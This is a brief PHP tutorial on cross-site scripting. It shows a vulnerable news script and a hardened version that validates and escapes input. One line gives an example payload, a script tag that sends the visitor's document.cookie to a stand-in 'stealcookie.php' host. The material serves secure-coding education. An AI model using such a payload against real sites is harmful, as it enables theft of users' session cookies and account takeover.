Cross Site Scripting (XSS)
Here is an example of a simple script that is vulnerable to XSS. It is used to fetch a news item based on an ID taken straight from the query string:
$id = $_GET['id']; // untrusted input, later echoed into the page without validation or escaping
If $_GET[‘id’] contains a number, then the script will run as intended. What happens if it contains the following:
<script>window.location.href = "http://domain.com/stealcookie.php?c=" + document.cookie;</script>
How to prevent XSS attacks?
- strip_tags(): Used to remove HTML tags from a string, rendering it harmless.
- htmlentities(): Used to convert < and > to &lt; and &gt; respectively (along with other characters that have HTML entity equivalents), if you do not want to remove HTML from a string but want the browser to display it as text instead of interpreting it.
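The two defences above applied to the news script, as an added example that is not part of the original page: the id parameter is validated as an integer before use, and anything that reaches the HTML response is escaped on output. The news lookup itself is a hypothetical stand-in.

```php
<?php
// Added example, not from the original page: a hardened version of the
// $id = $_GET['id'] script. The actual news lookup is assumed (not shown).
declare(strict_types=1);

// Allow-list the input: a news ID must be a positive integer, nothing else.
function parseNewsId(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Escape anything that reaches the HTML response, regardless of validation.
// ENT_QUOTES also escapes single and double quotes, so the value is safe
// inside quoted attributes such as value="..." as well as in element text.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderNewsPage(string $rawId): string
{
    $id = parseNewsId($rawId);
    if ($id === null) {
        // Reject the request rather than echoing the bad value back to the browser.
        return '<p>Invalid news item.</p>';
    }
    // Even a validated integer is escaped on output, so the rule stays uniform.
    return '<h1>News item ' . escapeHtml((string) $id) . '</h1>';
}

// Constructed inputs: a normal ID, then a script tag in place of the number.
echo renderNewsPage('42'), PHP_EOL;                        // <h1>News item 42</h1>
echo renderNewsPage('<script>alert(1)</script>'), PHP_EOL;  // <p>Invalid news item.</p>

// What escaping alone does to the same tag: the browser shows it as text.
echo escapeHtml('<script>alert(1)</script>'), PHP_EOL;      // &lt;script&gt;alert(1)&lt;/script&gt;
```

Run with `php example.php` from the command line; in the real script the first argument to renderNewsPage() would be `$_GET['id'] ?? ''`.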